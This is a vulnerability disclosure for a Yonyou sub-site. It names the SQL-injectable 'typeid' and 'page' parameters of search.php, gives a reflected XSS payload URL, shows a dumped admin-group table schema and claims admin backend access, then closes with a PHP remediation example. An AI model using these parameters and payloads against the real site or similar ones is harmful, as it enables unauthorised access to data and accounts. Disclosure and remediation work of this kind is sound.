SQL injection in a Yonyou sub-site, allows logging in to the admin backend
Bonus: one reflected XSS
http://aud.yonyou.com/php/search.php?keyword=&page=19&tag=1&total_record=943&typeid=1
The typeid and page parameters are injectable.
http://aud.yonyou.com/php/search.php?keyword=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28941058%29%3C%2fScRiPt%3E&page=1&tag=1&total_record=943&typeid=0
These parameters are all vulnerable to reflected XSS.
Database: ufaud_com
Table: cdb_admingroups
[17 columns]
+-------------------+----------------------+
| Column | Type |
+-------------------+----------------------+
| admingid | smallint(6) unsigned |
| allowbanip | tinyint(1) |
| allowbanuser | tinyint(1) |
| allowcensorword | tinyint(1) |
| allowdelpost | tinyint(1) |
| alloweditpoll | tinyint(1) |
| alloweditpost | tinyint(1) |
| allowedituser | tinyint(1) |
| allowmassprune | tinyint(1) |
| allowmodpost | tinyint(1) |
| allowmoduser | tinyint(1) |
| allowpostannounce | tinyint(1) |
| allowrefund | tinyint(1) |
| allowstickthread | tinyint(1) |
| allowviewip | tinyint(1) |
| allowviewlog | tinyint(1) |
| disablepostctrl | tinyint(1) |
+-------------------+----------------------+
The admin backend can be logged into.
Reflected XSS.
Fix:
Filter the input.
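As an added illustration of that fix (not the site's own search.php), the following handler treats page and typeid as validated integers bound through a prepared statement, and HTML-encodes the keyword on output so it is reflected as text rather than markup. It assumes an existing PDO connection and a hypothetical `articles` table; the real schema behind search.php is not given on the page.

```php
<?php
// Added example, not the site's code. Assumed: $pdo is a PDO connection and
// `articles` is a hypothetical table; the actual schema is not on the page.
declare(strict_types=1);

// Numeric parameters (page, typeid) are validated as integers and are never
// interpolated into SQL text.
function intParam(array $query, string $name, int $default, int $min = 0): int
{
    $value = filter_var(
        $query[$name] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min]]
    );
    return $value === false ? $default : $value;
}

function searchArticles(PDO $pdo, array $query, int $pageSize = 20): array
{
    $keyword = (string)($query['keyword'] ?? '');
    $page    = intParam($query, 'page', 1, 1);
    $typeid  = intParam($query, 'typeid', 0, 0);
    $offset  = ($page - 1) * $pageSize;

    // Prepared statement: user input travels as bound values, so a payload in
    // typeid or page cannot alter the query structure.
    $stmt = $pdo->prepare(
        'SELECT id, title FROM articles'
        . ' WHERE typeid = :typeid AND title LIKE :kw'
        . ' ORDER BY id DESC LIMIT :limit OFFSET :offset'
    );
    // Escape LIKE wildcards so a keyword of "%" does not match everything.
    $like = '%' . addcslashes($keyword, '%_\\') . '%';
    $stmt->bindValue(':typeid', $typeid, PDO::PARAM_INT);
    $stmt->bindValue(':kw', $like, PDO::PARAM_STR);
    $stmt->bindValue(':limit', $pageSize, PDO::PARAM_INT);
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Output encoding stops the reflected XSS: the keyword is echoed back as
// text, never as HTML, so <script> in the parameter is rendered inert.
function renderKeyword(string $keyword): string
{
    $safe = htmlspecialchars($keyword, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p>Results for: ' . $safe . '</p>';
}
```

Validation on input and encoding on output are separate controls: the integer check covers the injection in page and typeid, while htmlspecialchars covers the reflection of keyword, and neither substitutes for the other.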